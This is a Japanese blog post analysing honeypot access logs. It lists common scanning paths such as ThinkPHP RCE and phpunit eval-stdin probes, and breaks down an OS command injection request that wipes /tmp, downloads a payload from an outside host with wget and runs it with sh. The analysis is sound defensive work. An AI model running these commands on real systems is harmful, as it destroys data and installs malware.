下記のログを分析していくよ!
6350 /manager/html
462 /
157 /xmlrpc.php
85 /.env
42 /autodiscover
27 91.218.66.202:4444
27 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.sytes.net/jaws;sh+/tmp/jaws
14 /?XDEBUG_SESSION_START=phpstorm
13 /shell?cd+/tmp;rm+-rf+*;wget+%20http://23.94.7.175/.s4y/arm;sh+/tmp/arm
13 /_ignition/execute-solution
12 /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
12 /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
12 /_profiler/phpinfo
11 /debug/default/view?panel=config
11 /console/
11 /HNAP1/
10 /solr/admin/info/system?wt=json
10 /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
https://oubonarumamay.hatenablog.com/entry/2022/02/15/210000
今日は上記のログの中の下記のログを見ていきます。
17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.sytes.net/jaws;sh+/tmp/jaws
17アクセスきたこの攻撃。
1行を分解していくと下記のコマンドになります。
/shell
cd /tmp
rm -rf *
wget botaflatoon.sytes.net/jaws
sh /tmp/jaws
OSコマンドインジェクションですね。[1]
shellに対して、tmpディレクトリに移り、rm -rf *でtmpディレクトリ内のファイル全て削除。
そして、wgetでbotaflatoon.sytes.net/jawsにアクセスして何かをダウンロードしようとしてます。
最後に sh /tmp/jawsでダウンロードしてきたファイルを実行するという命令です。
不正アクセスしたログを削除した上で、マルウェアをダウンロードして実行するというものですね。
下記ブログでも似た攻撃が観測されています。
他の攻撃も観測されていますね。
他の攻撃のレポートもどんどん書いていきたいと思います。
参考サイト
[1]
OSコマンドインジェクションの仕組みとその対策 | セキュリティ対策 | CyberSecurityTIMES
使用しているハニーポット